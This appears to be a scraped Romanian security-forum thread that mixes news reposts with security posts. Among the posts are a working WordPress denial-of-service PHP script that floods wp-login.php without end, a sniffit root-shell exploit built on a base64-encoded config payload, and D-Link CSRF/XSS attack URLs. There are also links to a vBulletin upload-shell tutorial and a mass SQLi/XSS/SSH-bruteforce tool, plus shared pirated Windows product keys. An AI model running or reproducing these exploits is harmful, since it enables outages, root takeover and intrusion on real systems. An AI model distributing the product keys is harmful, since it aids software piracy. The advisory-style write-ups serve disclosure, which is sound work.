Aerosol

@Wired exista deja buton pentru asta revin cu poze ultimul buton apesi o data pe el si se face asa cam asta e tot. verifica si tu inainte sa faci topicuri aiurea...

@rom3ocrash inteleg nu e problema. si nu te supara fiindca esti atacat

Bitdefender Box tine virusii la distanta de gadgeturile parte din Internet of Things. Bitdefender a lansat, deocamdata in SUA, un produs unic, menit sa ofere securitate informatica dispozitivelor de orice tip conectate la Internet. Bitdefender Box va proteja nu doar calculatoarele, telefoanele si tabletele, ci si smart TV-urile, frigiderele inteligent, sistemele de iluminat sau sistemele de alarma conectate la Wi-Fi. Este o solutie antivirus atat software, cat si hardware, care va putea fi precomandata de americani de la mijlocul lunii decembrie, urmand ca produsul sa ajunga la utilizatori in ianuarie. Cei de la Bitdefender nu ataca deocamdata piata din Romania, deoarece aici numarul electrocasnicelor cu conexiune la internet este redus. Cu aceasta cutie pe care o pui in casa, o conectezi la Internet, si nu-ti mai faci griji in privinta virusilor, romanii sunt primii din primul jucator din industrie care creeaza o solutie completa impotriva amenintarilor informatice pentru Internet of Things. Lansarea oficiala a Bitdefender BOX va avea loc la sfarsitul lui ianuarie, in Statele Unite ale Americii. Planul de lansare include dupa piata americana, dar si cateva piete din Europa de Vest. Bitdefender BOX este un mix ingenios de hardware si software, prezentat intr-o carcasa cu un design minimalist, care ofera un nivel de protectie inovator pentru toate lucrurile si persoanele care trec pragul unei case. Gradul complex de protectie la nivel de retea previne orice tip de amenintare chiar dinainte de a ajunge pe dispozitivele inteligente care ne inconjoara acasa. Totodata, Bitdefender BOX este dotat si cu tehnologii anti-furt, care previn pierderea sau furtul dispozitvelor, dar si functii de tune-up, care optimizeaza si actualizeaza sistemele de operare pentru a asigura o functionare cat mai buna. Source Eu unul abia astept sa se lanseze si la noi.

@Mandrake1942 e config pentru bruteforce.

Am sa revin cu altele noi.

Oh, bine ai venit ceva proiecte?

Wordpress < 4.0.1 - Denial of Service ==================================================================== DESCRIPTION: ==================================================================== A vulnerability present in Wordpress < 4.0.1 allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of service). ==================================================================== Time Line: ==================================================================== November 20, 2014 - A Wordpress security update and the security advisory is published. ==================================================================== Proof of Concept: ==================================================================== Generate a pyaload and try with a valid user: echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload Perform a Dos with a valid user: for i in `seq 1 150`; do (curl --data @valid_user_payload [url]http://yoursite/wordpress/?q=user[/url] --silent > /dev/null &); sleep 0.5; done ==================================================================== Authors: ==================================================================== -- Javer Nieto -- [url]http://www.behindthefirewalls.com[/url] -- Andres Rojas -- [url]http://www.devconsole.info[/url] ==================================================================== References: ==================================================================== * [url]https://wordpress.org/news/2014/11/wordpress-4-0-1/[/url] * [url]https://www.drupal.org/SA-CORE-2014-006[/url] * [url]http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html[/url] * [url]http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html[/url] * [url]http://www.devconsole.info/?p=1050[/url] WordPress <=4.0 Denial of Service Exploit <?php echo "\nCVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability\n"; echo "Proof-of-Concept developed by john@secureli.com (http://secureli.com)\n\n"; echo "usage: php wordpressed.php domain.com username numberOfThreads\n"; echo " e.g.: php wordpressed.php wordpress.org admin 50\n\n"; echo "Sending POST data (username: " . $argv[2] . "; threads: " . $argv[3] . ") to " . $argv[1]; do { $multi = curl_multi_init(); $channels = array(); for ($x = 0; $x < $argv[3]; $x++) { $ch = curl_init(); $postData = array( 'log' => $argv[2], 'pwd' => str_repeat("A",1000000), 'redirect_to' => $argv[1] . "/wp-admin/", 'reauth' => 1, 'testcookie' => '1', 'wp-submit' => "Log%20In"); $cookieFiles = "cookie.txt"; curl_setopt_array($ch, array( CURLOPT_HEADER => 1, CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6", CURLOPT_REFERER => $argv[1] . "/wp-admin/", CURLOPT_COOKIEJAR => $cookieFiles, CURLOPT_COOKIESESSION => true, CURLOPT_URL => $argv[1] . '/wp-login.php', CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true, CURLOPT_POSTFIELDS => $postData, CURLOPT_FOLLOWLOCATION => true)); curl_multi_add_handle($multi, $ch); $channels[$x] = $ch; } $active = null; do { $mrc = curl_multi_exec($multi, $active); } while ($mrc == CURLM_CALL_MULTI_PERFORM); while ($active && $mrc == CURLM_OK) { do { $mrc = curl_multi_exec($multi, $active); } while ($mrc == CURLM_CALL_MULTI_PERFORM); } foreach ($channels as $channel) { curl_multi_remove_handle($multi, $channel); } curl_multi_close($multi); echo "."; } while (1==1); ?> WordPress <=4.0 Denial of Service Exploit Wordpress < 4.0.1 - Denial of Service

Microsoft is doing a fine job of burying Windows XP, but still has a long way to go toward getting people onto the latest version of its operating system. According to Statcounter, usage of Windows 8.1 narrowly overtook Windows XP in November. That's partly due to record growth for Windows 8.1, which went from 9.31 percent in October to 10.95 percent last month. Windows XP usage also continued to plummet in its seventh full month without Microsoft support, dropping from 11.95 percent to 10.69 percent. Further reading: The Windows 8.1 Update finally makes Microsoft's Metro future PC-friendly Windows 8.1 is likely benefiting from the back-to-school season, as most new PCs are shipping with the operating system on board. Some Windows 8 users may still be getting around to the free upgrade as well, as Windows 8 usage dropped from 5.94 percent to 4.9 percent in November. But none of this activity appears to be harming Windows 7, whose usage increased for the second straight month. The five-year-old operating system now accounts for 50.34 percent of desktop usage, so it's the most popular desktop OS by far. Another metrics firm, Netmarketshare, also recorded share increases for both Windows 7 and Windows 8.1 last month, but still shows Windows XP ahead of the latest version by a narrow margin, despite plummeting usage for the ancient OS. It seems likely that Windows 8.1 will land on top for both metrics firms within a month or two. The story behind the story: On some level, Microsoft is happy as long as it's selling licenses. (In its push to kill XP, the company has encouraged users to consider either Windows 7 or Windows 8.) But of course, Microsoft would prefer to get users onto the latest version, which is tied more deeply into services like OneDrive and Bing. Expect a major upgrade offensive against Windows 7 next year, with rumors of free or cheap consumer upgrades to the more desktop-friendly Windows 10. Source

@narciszu m-am exprimat eu gresit sunt Product Key-uri

@logged da mersi acum am observat ca nu toate sunt pentru steam. sorry am dat edit la titlu.

If you believe that protecting against cyberattacks from government agencies requires the same processes as defending against any other threat -- well, to some extent, you are right. Government agencies will happily use easy "script kiddie" tools and well-known exploits to get into your systems to avoid tipping their hand about who they are and what they're really after. And they have the money to buy and use the most advanced tools used by criminal organizations to get into your payments data. So protecting against these kinds of common attacks is necessary if you are trying to protect yourself against state-sponsored attackers -- but it is not sufficient. There are some key differences about attacks that originate with foreign governments, and ignoring these differences could prove deadly. 1. They're going after different types of data Vandals are out to make a loud splash, so they'll go after public-facing websites, or just randomly disrupt whatever's within reach. Criminals will go after stuff they can sell. Foreign nations will hit embassies and government agencies for political information, said Jaime Blasco, director of labs at San Mateo, CA-based AlienVault, Inc. And they'll go after private companies, as well -- and not just defense contractors, either. "If specific companies have developed a technology or method to do something, they might steal information to gain that information for competitive advantage for Chinese companies," he said. And they'll also go against personal information or business information that would provide them with insights they need to break into more companies. Blasco was part of the team that took down UglyGorilla, a Chinese hacker who broke into computers at five U.S. Companies including Westinghouse Electric Co. and United States Steel Corp earlier this year and stole trade secrets and other information. Blasco also uncovered Sykipot, a China-based attack which was able to bypass two factor authentication and steal trade secrets from the automotive and aerospace industries. "What we thought was a primary reason for gain might not be as obvious anymore," said Carl Wright, general manager at San Mateo, CA-based TrapX, which recently uncovered a Chinese attack against international shipping and logistics companies. For example, an attack against certain types of agricultural equipment might produce valuable insights about grain production, he said. 2. The might not be after data at all Foreign governments are after power, and not just in the "information is power" kind of way. They'll go after another country's actual power grid, fuel pipelines, or nuclear reactors. "They would be also happy causing disruption in government services, taking out communication systems, disrupting a nation's economy, or causing reputation damage of state-related institutions," said Jeff Williams, CTO at Palo Alto, CA-based Contrast Security. Of course, we play this game as well. it's pretty well accepted that the U.S. was behind the Stuxnet attacks that took out the nuclear reactors in Iran and delayed their ability to produce weapons significantly, said Williams. 3. They're operating on a longer timescale Criminals and vandals are after quick payoffs. "When you steal someone's credit card, the time period that that's a valuable asset is very short," said Carl Wright, general manager at San Mateo, CA-based security firm TrapX. "At some point, the credit card company cancels that credit card and the consumer is issued a new card." A foreign government, by comparison, could have unlimited patience. "They might get in and sit there for a while and not try to do a whole lot until they feel the time is right," said Ben Johnson, chief security strategist at Waltham, Massachusetts-based Bit9, Inc. In fact, he said, they might actually patch vulnerabilities they find in order to keep anyone else from getting in and setting off alerts. "If they think they tripped up a defense, they might lay low for a little bit," he said. "Or, on the flip side of that, if they think they're about to be kicked out because the company is killing off the user accounts, they might grab data as fast as possible." 4. They might never be discovered According to this year's Verizon breach report, 84 percent of the reported attack discoveries were made by third parties. This is particularly the case of credit card data, said D.J. Vogel, a partner in the security and compliance practice at Naperville, Ill.-based professional services firm Sikich LLP. When payment data is stolen, there are numerous third-parties involved that might sound the alert, he explained. The individual consumer, for example, who finds unusual charges on her bill. The payments processors and credit card companies who monitor transactions for unusual patterns. Law enforcement agencies eavesdropping on illegal credit card number auctions. But when it comes to the theft of trade secrets, it could be years before the victim finds out -- if they find out at all, he said. "The industry as a whole is less likely to identify state-sponsored attacks, he said. "It's much easier to fly under the radar, and not be undetected." And even if a company discovers that it's been attacked and data was stolen, that's still not the whole story. "The million-dollar question becomes what the heck they're doing with it?" asked Dodi Glenn, senior director of security intelligence and research labs at Clearwater, FL-based ThreatTrack Security, Inc. "Are they trying to design another apple iPhone and sell it cheaper? Or are they trying to tap into an iPhone with some vulnerability that they'll never disclose? They don't make it known what they do with the data. We can only infer what they're targeting." 5. They're not afraid to get physical Despite what you see on television, a criminal isn't likely to follow a company executive around in order to physically infect their laptop or cellphone with malware. The cost -- time, travel expenses, possibility of getting caught -- are too high. It's much easier to go after some other executive who has a phone that can be hacked without physical contact. In the case of state-sponsored attacks, however, especially within that state's own borders, the costs and risks are minimal. In fact, they might actually set up a meeting with the targeted executive, said Michael Shaulov, CEO at San Franscisco-based Lacoon Mobile Security, Inc. Then all they need is a little private time with the laptop or cell phone in order to infect it. There are even several ways to infect iPhones, Shaulov added. And, of course, a foreign nation-state often has full access to its own telephone networks. 6. The airwaves aren't safe The airwaves aren't safe either, Shaulov added. "In Russia, they discovered a couple of fake mobile cell towers," he said. "Every time someone would pass through that coverage area, someone in the government would intercept their communications." The same approach works on foreign territory as well, he added. A mini cellphone tower can be hidden in a suitcase and carried to a location close to the target, or placed in a vehicle in order to have a larger coverage area. "If you look out the window and see a white van, be suspicious," he said. 7. They stay on target A financially-motivated criminal wants to see the biggest return on their investment, so they'll go after the least-defended companies first. "There are certainly plenty of targets," said Steve Hultquist, chief evangelist at Sunnyvale, Cal.-based RedSeal, Inc. "I can just go on to the next one." A company doesn't have to have perfect security to defend itself -- all it has to do is avoid being the lowest-hanging fruit. A state-sponsored attacker, however, is motivated by strategic gain, not financial. They'll keep after a company, its employees, and its business partners, until they get in. 8. They have a large, well-organized team Criminals are most likely to work alone, or in loosely-affiliated teams. A state-sponsored attacker, however, might be working out of an actual office, under a well-trained project manager. "State-sponsored cyberattacks are much more likely to be organized and run by a large group of people," said Jeff Williams, CTO at Palo Alto-based Contrast Security. "They're going to have a full lab full of people trained and executing a whole bunch of attacks against a whole bunch of things at once." And they'll work around the clock, added Udi Mokady, CEO at Israel-based CyberArk Software, Ltd. "It's based on people working shifts with well-managed processes and development," he said. "They behave like a development arm and are able to carry out sophisticated attacks." And speaking of development... 9. They'll create new zero-day exploits A foreign government can afford to create a brand new, unique zero-day attack to go after individual targets. "They are deeply talented and likely spend substantial resources to identify zero day vulnerabilities," said John Dickson, principal at San Antonio, TX-based Denim Group, Ltd. "They have shown willingness to have a lot of people spend a ton of time trying to get into certain places." And the foreign government would then keep those vulnerabilities secret, to use them again, or to ensure that it's attack wouldn't be discovered. A criminal is also interested in getting the maximum use possible out of an exploit, but within a much shorter time frame. An exploit that's sitting around not being using isn't making them any money and, given how slowly some companies patch, even a discovered exploit can remain profitable for years to come. 10. They set the bar for other types of attacks "The reality is that US companies and government agencies only barely prepared for the very lowest level of threat -- the auditor," said Contrast Security's Williams. And auditors are always several years behind the curve, because they use regulations and standards drafted years before. That means that most organizations are unprepared for techniques commonly used today by all types of hackers, such as automated tools. "We should be building systems designed to resist the attacks that we expect ten years from now, not the attacks occurring two years ago," he said. That means that all organizations should be getting ready to face long-term, well-coordinated, almost invisible attacks. "In ten years, this type of attack will be available to even unskilled attackers, and we should be preparing our critical infrastructure to withstand it," he said. Source

Hello list! There are Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router). ------------------------- Affected products: ------------------------- Vulnerable is the next model: D-Link DAP-1360, Firmware 1.0.0. This model with other firmware versions also must be vulnerable. D-Link will fix these vulnerabilities in the next version of firmware (will be released in November), as they answered me in October. But in November they answered me, that firmware still was not publicly released due to the bugs and they need to work on it. I tested model DAP-1360/B/D1B. There are three models of DAP-1360: DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's EOL device. DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link will fix the vulnerabilities in new firmware, which will be released in November. DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware includes fixes for the vulnerabilities. ---------- Details: ---------- In section Wi-Fi - MAC filter - Filter mode it's possible to change parameter MAC filter restrict mode: Disabled: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:0}]} Allow: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:1}]} Deny: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:2}]} In section Wi-Fi - MAC filter - MAC addresses it's possible to add and remove MAC addresses: Add: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22] Remove: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=44&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22] XSS (persistent XSS) (WASC-08): http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22] Code will execute at http://192.168.0.50/index.cgi#wifi/mac. ------------ Timeline: ------------ 2014.05.22 - informed developer about multiple vulnerabilities. 2014.06.21 - announced at my site about new vulnerabilities in DAP-1360. 2014.11.26 - disclosed at my site (http://websecurity.com.ua/7215/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Source

CVE-2014-5439 - Root shell on Sniffit Authors: Ismael Ripoll & Hector Marco CVE: CVE-2014-5439 Dates: July 2014 - Discovered the vulnerability Description Sniffit is a packet sniffer and monitoring tool. A bug in sniffit prior to 0.3.7 has been found. The bug is caused by an incorrect implementation of the functions clean_filename() and clean_string() which causes a stack buffer overflow when parsing a configuration file with "long" paths (more than 20 characters). The attacker can to create a specially-crafted sniffit configuration file, which is able to bypass all three protection mechanisms: Non-eXecutable bit NX Stack Smashing Protector SSP Address Space Layout Randomisation ASLR And execute arbitrary code with root privileges (the id of the user that launches the sniffit). The new issue has been assigned CVE-2014-7169. The presented PoC successfully exploits the vulnerability. Impact To use the sniffit, the application need to be executed with root privileges. Typically by sudo or pkexec or setting the UID bit. Since this tool requires this privilege to execute the sniffer, only allowing to a user execute the sniffer is enough to execute commands as root. Vulnerable packages The sniffit 0.3.7 and prior are affected. Currently, this tool is in the universe repository installable via apt-get install sniffit. For example, the sniffit is available on Ubuntu 14.04.1 LTS and prior. Vulnerability The vulnerability is caused due to incorrect implementation of the functions clean_filename() and clean_string(). These functions suffer from a stack buffer overflow. The bug appears in file sn_cfgfile.c on the following functions: char *clean_string (char *string) { char help[20]; int i, j; j=0; for (i=0;i<strlen(string);i++) { if( (isalnum(string[i]))||(string[i]=='.') ) { help[j]=string[i]; help[j+1]=0; } j++; } strcpy(string, help); return string; } char *clean_filename (char *string) { char help[20]; int i, j; j=0; for (i=0;i<strlen(string);i++) { if( !(iscntrl(string[i])) && !(isspace(string[i])) ) { help[j]=string[i]; help[j+1]=0; } j++; } strcpy(string, help); return string; } Exploit (PoC) I have built an exploit to bypass the three most popular protections techniques: Non-eXecutable bit NX, Stack Smashing Protector SSP and Address Space Layout Randomisation ASLR. The exploit finally obtains a root shell. The exploit was successfully tested with Ubuntu 14.04.1 LTS (trusty) with kernel 3.13.0-32-generic (x86_64) fully updated. The sniffit exploit is a shell script which will creates a specially-crafted configuration file "exploit-sniffit-0.3.7-shell.cfg". Passing this configuration file to sniffit through the "-c" option we will obtain a root shell. ---- start exploit-sniffit-0.3.7-shell.sh exploit ---- cfgfile=' bG9nZmlsZSAvL2Jpbi9zaApsb2dmaWxlIIiIiIiIiIiImZmZmZmZmZmqqqqqqqqqqgYGBgYGBgYG QUFBQUFBQUEHBwcHBwcHB0NDQ0NDQ0NDRERERERERERFRUVFRUVFRUZGRkZGRkZGR0dHR0dHR0dJ P0AGBgYGBiH8YAYGBgYGKzxABgYGBgYh/GAGBgYGBtWbQAYGBgYGCkV4cGxvaXQgYnkgSGVjdG9y IE1hcmNvIDxobWFyY29AaG1hcmNvLm9yZz4KaHR0cDovL2htYXJjby5vcmcK' echo "" echo "-----------------------=======-------------------------" echo "----------------=======================----------------" echo "" echo " Author: Hector Marco-Gisbert <hmarco@hmarco.org>" echo " Website: http://hmarco.org" echo " Comment: Exploit for sniffit <= 0.3.7 (root shell)" echo "" echo "----------------=======================----------------" echo "-----------------------=======-------------------------" echo "" echo "[+] Creating crafted configuration file for sniffit ..." echo "${cfgfile}" | base64 -d > exploit-sniffit-0.3.7-shell.cfg echo -e "\n[+] File exploit-sniffit-0.3.7-shell.cfg successfully created !" echo "" echo "[+] Help:" echo " If your sniffit is installed with the Set-User-ID then execute:" echo " $ sniffit -c exploit-sniffit-0.3.7-shell.cfg" echo "" echo " If your are allowed to to execute the sniffit with sudo then execute:" echo " $ sudo sniffit -c exploit-sniffit-0.3.7-shell.cfg" echo "" ---- end exploit-sniffit-0.3.7-shell.sh exploit ---- Obtaining a root shell: box@upv.es:~$ id uid=1000(box) gid=1000(box) groups=1000(box) box@upv.es:~$ sniffit -c exploit-sniffit-shell.cfg # # id uid=1000(box) gid=1000(box) euid=0(root) groups=1000(box) FIX The following is a simple patch which fixes the bug. Patch for sniffit 0.3.7: diff -Nurp sniffit-0.3.7.beta/sn_cfgfile.c sniffit-0.3.7.beta-mod/sn_cfgfile.c --- sniffit-0.3.7.beta/sn_cfgfile.c 2014-10-22 19:29:03.000000000 +0200 +++ sniffit-0.3.7.beta-mod/sn_cfgfile.c 2014-10-22 19:29:12.244971893 +0200 @@ -119,6 +119,11 @@ char *clean_string (char *string) char help[20]; int i, j; +if(strlen(string) >= 20){ + fprintf(stderr, "Error: String too long [%s]\n", string); + exit(-1); +} + j=0; for(i=0;i<strlen(string);i++) { @@ -138,6 +143,11 @@ char *clean_filename (char *string) char help[20]; int i, j; +if(strlen(string) >= 20){ + fprintf(stderr, "Error: String too long [%s]\n", string); + exit(-1); +} + j=0; for(i=0;i<strlen(string);i++) { [ sniffit-0.3.7-stack-buffer-overflow.patch ] Patching sniffit 0.3.7: wget http://hmarco.org/bugs/patches/sniffit-0.3.7-stack-buffer-overflow.patch cd sniffit-0.3.7 patch -p1 < ../sniffit-0.3.7-stack-buffer-overflow.patch Discussion It is hard to understand why the sniffit is still under Ubuntu universe repository, which is easily installable via apt-get install sniffit. The functions clean_string and clean_filename contain two stack buffer overflows which allow to bypass the Stack Smashing Protector (SSP) very easy and build a sequence of ROP gadgets which finally obtains a root shell. On the other hand, it seems that the code of sniffit is no longer maintained, and may contain additional security issues. Therefore, it is very recommend to not use the sniffit at all for the sake of your security. Hector Marco - http://hmarco.org Source

An international operation led by Europol has seized the domain names of 292 websites that were selling counterfeit or pirated products. The seizures are part of Europol's In Our Sites project and involved 25 law enforcement agencies from 19 countries, including the UK, Spain, France and Denmark, with the assistance of the US Department of Homeland Security's Immigration and Customs Enforcement. Europol said that the action followed leads received in August from trademark holders about the infringing websites. The seized domain names now remain in the possession of the governments involved in the operations. The most popular domains proved to be websites selling counterfeit luxury goods, sportswear, electronics and pharmaceuticals, along with pirated music and films. People trying to access the seized domains will encounter a notice explaining why the websites are unavailable and the criminality behind copyright infringement. "The infringement of international property rights is a growing problem in our economies and for millions of producers and consumers," said Europol director Rob Wainwright. "Europol is committed to working with its international partners to crack down on the criminal networks responsible for this illegal activity." The In Our Sites project has resulted in the seizure of 1,829 domain names since its inception in November 2012. Interpol said that counterfeit goods put personal financial information at risk of fraud, and often fund more serious criminal operations. "The crimes can cause revenue and tax losses, unemployment, environmental, health and safety issues for humans and animals, human exploitation and child labour," said Europol. The law enforcement agency emphasised that consumers should report the counterfeit products and the websites selling them, explaining that "counterfeiting crimes result in many victims". V3 contacted Europol to find out how it prevents the websites appearing in the first place, rather than taking them down after they emerge, but the agency has yet to respond. Europol appears to be scaling up its operations to tackle cyber crime. The organisation recently joined forces with the European Banking Federation to share information on cyber threats.Source

E-cigarettes have been fingered as the source of a new computer virus. "IT guy" Jrockilla told the Talesfromtechsupport forum that he suspects the malware was "hard coded" into the USB charger of his boss's electronic toker. In his post, he says: He added: During the subsequent debate on Reddit, users called for further evidence that the charger was indeed the source, and that hasn’t been forthcoming, but it does point to the danger corporates face with users plugging unauthorised devices into USB ports for charging. One user suggests that while a memory device will announce itself when plugged in, a keyboard will not, so a malevolent USB device could masquerade as a keyboard and then accept the security prompts which flashed up as the device asked for permissions. A savvy user would spot this if they were watching but not if they were busy fiddling with an e-cig (essentially a battery-powered vaporizer which has the feel of tobacco, but produces only an aerosol) at the same time. Naturally, the non-smoking sticks could be charged with a wall charger but IT professionals need to be aware that the threat exists. Again, the thread warns that it might be significant pointing to research by the German researchers SRLabs that USB devices can be made unstoppable. It has also been suggested that a device is used to limit the USB port, but that is of course moving the trust around. If you really want to investigate what a port is doing, there are devices such as Facedancer which will investigate just that sort of thing. In the meantime, it might just be easier to quit altogether. Source

KASPERSKY HAS USED ITS annual gaze into the crystal ball of cybercrime to predict attacks on digital wallet and virtual payment schemes, citing Apple Pay as a potential target. The malware-mashing security company has suggested that ATMs and payment systems will be likely targets for hackers in the coming 12 months, naming the recently launched Cupertino Bucks service as a probable victim. Apple Pay launched in the US in October and has had its fair share of headlines, not least after Tim Cook announced that the addition of NFC was one of the "biggest advances in iPhone history", coming a mere eight years after the Nokia 6131 became the first NFC-equipped handset. A launch of the service in Europe is earmarked for 2015, and it is likely to see a whole new audience of hackers as the profitability and turnover of the service grows. The Kaspersky Security Bulletin 2014. Predictions 2015 report explains: "Previous attacks have focused on NFC payment systems but, thanks to limited adoption, these have reaped limited rewards. Apple Pay is bound to change that. "The enthusiasm over this new payment platform is going to drive adoption through the roof and that will inevitably attract many cyber criminals looking to reap the rewards of these transactions." Despite praising the security of Apple Pay, Kaspersky warns that it is not a time for complacency. "Apple's design possesses an increased focus on security (like virtualised transaction data) but we'll be very curious to see how hackers will exploit the features of this implementation," the report said. Other trends in the what's hot and what's not of digital debauchery include more 'bleeds' on the internet in the wake of Heartbleed, the distribution of malware for OS X on torrent sites, more targeted cyber attacks on banks and more ATM hijacks. Kaspersky also believes that the more "in your face" gangs are being replaced by smaller groups launching attacks separately, leaving people with niggly little attacks rather than an overarching threat from a gang of super-villains. The report also suggests that we can expect to see "displays of weakness" in the Internet of Things, and the first signs of adware or spyware in smart TV programming. Source

Cateva Product Key-uri pentru windows (XP,7,8 si server 2008) https://mega.co.nz/#!RdQCgLAQ!oWsz5Y-S7E3BZOrd3c4cvKhc0UpWvDLW1Tub7nWk0x0 pass: https://rstforums.com parola este dupa //

Dupa cum scrie si in titlu este o arhiva ce contine 2 video-uri primul: vBulletin Remote Code Execution si al doilea -vBullletin Remote Code Execution Upload Shell Tutorial Link: https://mega.co.nz/#!EZJlzQ7T!wCcAbWRiITpgJIwCgm2PUgf8anKua5XJu-rLw1TeR0c Pass: https://rstforums.com parola este dupa //

Am facut o lista cu 30 ebook-uri https://mega.co.nz/#!0EJR2YAa!WRjIEWBHcgI27OklisXWP8SAyOjFygv2Jrexs7z15Ho pass: https://rstforums.com parola e dupa //

Arpwatch and arpsnmp are both network monitoring tools. Both utilities monitor Ethernet or FDDI network traffic and build databases of Ethernet/IP address pairs, and can report certain changes via email. Download

Basically, FSU is bunch of tools written in PHP-CLI. Using build-in functions, you are able to grab url's using search engines - and so, dork for interesting files and full path disclosures. Using list of url's, scanner will look for Cross Site Scripting, Remote File Inclusion, SQL Injection and Local File Inclusion vulnerabilities. It is able to perform mass bruteforce attacks for specific range of hosts, or bruteforce ssh with specific username taken from FPD. Whenever something interesting will be found, like vulnerability or broken auth credentials, data will be saved in .txt files - just like url's, and any other files. FSU is based on PHP and text files, it's still under construction so i am aware of any potential bugs. Principle of operation is simple. Download - https://github.com/Smaash/fuckshitup

XSS (Cross Site Scripting) I posted this on Byteoverflow awhile ago and DECIDED to post it here. I hope to do these for a bunch of different vulnerabilities. In this particular one I will be doing XSS aka Cross Site Scripting. Often overlooked and XSS vulnerabilities is Considered useless. This is FAR from the case. XSS vulns are very Dangerous and Need to be Taken Seriously just like sqli vulns have. The Possibilities When it comes to have endless XSS vulns. I Will Be Discussing the two types of XSS vulns today, Persistent and Non-Persistent. If you have any questions feel free to ask Them here. Non Persistent Non Persistent XSS vulnerabilities is the when user input is not sanitized and used Properly Immediately after the request is made??. THESE ARE GeneRally not as Dangerous, But definitely Need to be addressed and Taken Care of. With Persistent Non vulns Would you usually have to trick someone into Clicking the link with the XSS payload. Whereas with persistent vulns the payload is embedded in a normal page and people can stumble Across Even without knowing it, we Will talk more about That later. Here is a simple example of a Non-Persistent XSS vulnerability. I will be doing a simple search script That uses GET for this example. search.php <form action = "" method = "get"> Search Value: <input type = 'text' name = 'squery'> <input type = 'submit' name = 'search' value = 'Search'> </ form> <? php if (isset ($ _ GET ['squery'])) { $ SEARCH_QUERY = $ _GET ['squery]; echo "Search results for $ SEARCH_QUERY"; // Continue with search code here } ?> So in this simple code what's happening is it is taking the user input (the search value) then using it in a GET request to later use in a search query. To the average user this looks like a simple search That there is nothing wrong with. But the user input is not being sanitized Properly. The GET request is being used in year echo statement without being sanitized. Means That Could users input HTML and have it execute. As you can see I was Able to input HTML, in this case the font tag and have it execute. You can see When I submitted the form the WAS red font. This is a huge problem. This now allows attackers to input the which can lead to Javascript Java Drive By's, Cookie Stealing, and many other exploits. Again, you can see the JavaScript That is getting executed. In this case it is just a simple alert, But can it BE any Javascript payload year attacker might have. What Makes Non Persistent Now this is it does not Affect That any person goes to the search page. However if year attacker can get someone to click on a link it can Affect Them. Now all have to do Would attacker year is get the victim to click a link with Their malicious payload. http://example.com/search.php?squery=<script src = 'link to payload'> </ script> & search = Search And THEY always Could Shorten the link to make it less Obvious. http://goo.gl/HAKnUV Now let's look at Where the vulnerability exists in the code and how to fix it. $ SEARCH_QUERY = $ _GET ['squery]; echo "Search results for $ SEARCH_QUERY"; So Those two lines of code in what is happening is it's getting the user input via the squery GET value. It is the then echoing it out to the user. We need to Properly sanitize the $ SEARCH_QUERY variable Before we use it in year echo. We can do this using htmlspecialchars or htmlentities. $ SEARCH_QUERY = htmlspecialchars ($ _ GET ['squery']); echo "Search results for $ SEARCH_QUERY"; Or $ SEARCH_QUERY = htmlentities ($ _ GET ['squery']); echo "Search results for $ SEARCH_QUERY"; Now you can see INSTEAD of treating the variable as HTML and executing it, it is treating it as a string and Completely ignoring the FACT That it is HTML. Persistent (Stored) Persistent Stored XSS vulnerabilities occur or the when user input is Stored on the server (usually in the DB) then later displayed on a page without proper sanitation. Persistent XSS vulnerabilities is much more Dangerous than Non Persistent. THESE types of vulnerabilities do not Require anyone to click a link or Anything. THEY CAN BE browsing a site just like normal and come Across the malicious payload Even without knowing. I will be showing you a simple year with comments example script. Here is the simple script We will be using for year example. <b> <u> <font size=6> Title </font> </u> < b> <div id = "content"> sadjasldjasd asdj asdj asdas <br> d I <br> dsad sadsaldjas <br> dasdnasd ankd Kingdom <br> sadjalkjd ad asd <br> asdlas djas d <br> asd Sadki sadj <br> asd alsdksa dsadj sadj sad, sad lj <br> Sadna sdlasd <br> </ div> Grepolis <? php if (! mysql_connect ("localhost", "root", "root")) { die ('MySQL connection failed'); } // Post comment stuff if (isset ($ _POST ['submitcomment'])) { $ comment = mysql_real_escape_string ($ _POST ['comment']); if (mysql_query ("INSERT INTO xss.comments (comment) VALUES ('". $ comment. "')")) { echo "Comment posted <br>" } Else { echo "Failed to post comment <br>" } } echo "<b> <u> <font size = 4> Comments </ font> </ u> </ b> <br>" $ get_comments = mysql_query ("SELECT * FROM xss.comments"); if (mysql_num_rows ($ get_comments) == 0) { echo "No comments to display <br>" } Else { while ($ c = mysql_fetch_array ($ get_comments)) { $ comment = $ c ['comment']; echo "$ comment <hr>"; } } ?> <form action = "" method = "post"> Submit Comment: <br> <textarea rows = "4 'cols = '50' name = 'comment'> </ textarea> <br> <input type = 'submit' name = 